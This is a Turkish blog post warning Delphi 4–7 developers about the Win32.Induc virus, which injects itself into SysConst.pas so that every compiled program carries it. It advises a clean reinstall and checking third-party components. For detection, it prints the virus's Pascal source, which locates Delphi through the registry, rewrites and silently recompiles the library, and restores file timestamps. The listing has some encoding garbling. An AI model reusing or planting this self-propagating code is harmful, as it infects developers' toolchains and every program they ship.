W32/Induc virüsü Delphi’ye bulaşıyor

Delphi’nin Syscons.dcu veya sysconst.pas dosyasına bulaşan bir virüs peydah oldu.

Kaspersky’da adlandırması Win32.Induc.a olarak geçiyor, kendisini sysconst.pas’a include etmek sureti ile bulaşıyor.

Böylelikle her derlemede exe içerisinde virüscük de yaşamaya devam ediyor.

Bu durumda önce virüs temizliği sonra mutlaka delphi’ı kaldırıp tekrar kurmak lazım (ben öyle yaptım).

Evet ne yazıkki sisteminizde hiç virüs olmasa da kullandığınız ücretsiz full open source komponentler de ne yazıkki virüse neden olabiliyor.

Her yüklediğimiz yeni komponeneti bir de kod kontrolünden geçirmek lazım sanırım.

Virüslü olup olmadığınız anlamak için sysconst.pas içinde aşağıdaki kodlar var mı yok mu bakmak gerekiyor. Tabi bu sadece bu türün bir türevi ise dışarıdan aldığımız her komponenti incelemek de şart.

Delphi 4-7 geliştirme ortamına bulaşan virüs varyantının kodları aşağıdaki gibi.

uses windows; 
 var sc:array[1..24] of string=( 
function x(s:string):string; 
var i:integer; 
begin for i:=1 to length(s) do 
if s[i]" =#36 then 
s[i]:=#39; 
result:=s; 
end; 

procedure re(s,d,e:string); 
var f1,f2:textfile; 
h:cardinal; 
f:STARTUPINFO; 
p:PROCESS_INFORMATION; 
b:boolean; 
t1,t2,t3:FILETIME; 
begin 
h:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0); 
if h<>DWORD(-1) then begin 
CloseHandle(h); 
exit; 
end; 
{$I-}assignfile(f1,s); 
reset(f1); 
if ioresult<>0 then exit;assignfile" 
(f2,d+$pas$); 
rewrite(f2); 
if ioresult<>0 then begin 
closefile(f1); 
exit; 
end; 
while 
not eof(f1) do begin 
readln(f1,s); 
writeln(f2,s);  
if pos($implementation$,s)<>0 then break; 
end; 

for h:= 1 to 1 do writeln(f2,sc[h]); 
for h:= 1 to 23 do writeln(f2,$$$$+sc[h],$$$,$); 
writeln(f2,$$$$+sc[24]+$$$);$); 
for h:= 2 to 24 do writeln(f2, x(sc[h])); 
closefile(f1); 
closefile(f2); 
{$I+}MoveFile(pchar(d+$dcu$),pchar(d+$bak$)); 
fillchar(f,sizeof(f),0); f.cb:=sizeof(f); 
f.dwFlags:=STARTF_USESHOWWINDOW; 
f.wShowWindow:=SW_HIDE; 
b:=CreateProcess(nil,pchar(e+$""$+d+$pas""$),0,0,false,0,0,0,"f,p); 
if b then WaitForSingleObject(p.hProcess,INFINITE);MoveFile(pchar(d+$bak$), pchar(d+$dcu$)); 
DeleteFile(pchar(d+$pas$)); 
h:=CreateFile(pchar(d+$bak$),0,0,0,3,"0,0); 
if  h=DWORD(-1) then exit; 
GetFileTime(h,@t1,@t2,@t3); CloseHandle(h); 
h:= CreateFile(pchar(d+$dcu$),256,0,0,3,0,0); 
if h=DWORD(-1) then exit; 
SetFileTime(h,@t1,@t2,@t3); 
CloseHandle(h); 
end; 

procedure st; 
var  k:HKEY; 
c:array [1..255] of char; 
i:cardinal; r:string; v:char; 
begin for v:=$4$ to $7$ do 
if RegOpenKeyEx( HKEY_LOCAL_MACHINE,pchar($Software\Borland\Delphi$+v+$.0$),0,KEY_READ,k)=0 then 
begin i:=255;i 
if RegQueryValueEx(k,$RootDir$,nil,@i,@c,@i)=0 then begin 
 r:=$$; 
i:= 1; 
 while c[i]<>#0 do begin 
r:=r+c[i];inc(i); 
end; 
re(r+$\source\rtl\sys\SysConst$+$.pas$,r+$\lib\sysconst.$,$$+r+$\bin\dcc32.exe"" $); 
end; 
RegCloseKey(k); 
end; 
end;" 

//main code 
begin st; end."

Kaynak: kontrolkalemi.com

Yazar: Özgür Koca

Yazar - Tankado.com

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

This site uses Akismet to reduce spam. Learn how your comment data is processed.